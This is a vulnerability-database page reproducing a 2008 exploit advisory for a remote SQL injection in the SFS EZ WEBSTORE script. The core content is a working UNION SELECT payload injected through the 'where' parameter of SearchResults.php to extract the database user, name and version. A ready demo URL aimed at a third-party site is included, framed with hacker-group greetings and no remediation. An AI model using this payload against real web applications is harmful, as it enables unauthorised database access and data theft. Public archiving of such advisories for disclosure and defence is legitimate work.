Lucene search

sfsezwebsote-sql.txt

🗓️ 03 Nov 2008 00:00:00Reported by ZoRLuType

packetstorm🔗 packetstormsecurity.com👁 18 Views

SFS EZ WEBSTORE remote SQL injection discovered by ZoRLu on 01.11.200

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`[~] SFS EZ WEBSTORE remote sql inj  
[~]  
[~] SearchResults.php (where)  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 01.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: [email protected]  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~]   
[~] N0T: a.q kpss : ) )  
[~]  
[~] -----------------------------------------------------------  
  
Exploit:  
  
http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]  
  
[SQL]=  
  
ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*  
  
demo  
  
http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

03 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4